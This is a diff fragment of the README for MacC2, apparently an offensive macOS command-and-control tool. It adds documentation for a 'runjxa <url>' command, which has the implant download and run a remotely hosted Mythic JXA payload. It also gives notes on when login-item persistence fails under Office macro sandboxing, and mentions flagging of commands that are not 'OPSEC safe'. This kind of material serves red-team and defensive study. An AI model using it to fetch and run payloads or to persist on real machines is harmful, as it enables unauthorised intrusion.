gavz/MacC2/README.md

 Each command is pretty straightforward.
 The command options that are not OPSEC safe (i.e., command line executions or cause pop ups) are also flagged in red from the help menu.

+Functions of Note:

+- You can generate a Mythic C2 JXA .js payload, download it, and host it on a remote server.
+Then you can provide the url to the hosted file to MacC2 using the **runjxa** command to have MacC2 download and execute the Mythic .JXA payload:

+**>>> runjxa <url_to_JXA_.js_payload>**

+- Note: If you gain access using the MS Office macro, then the persistence method will not work due to sandboxing.
+The files will still be dropped and the login item will still be inserted but upon reboot the quarantine attribute prevents the persistence from executing.
 ----------

 **_Additional Info_**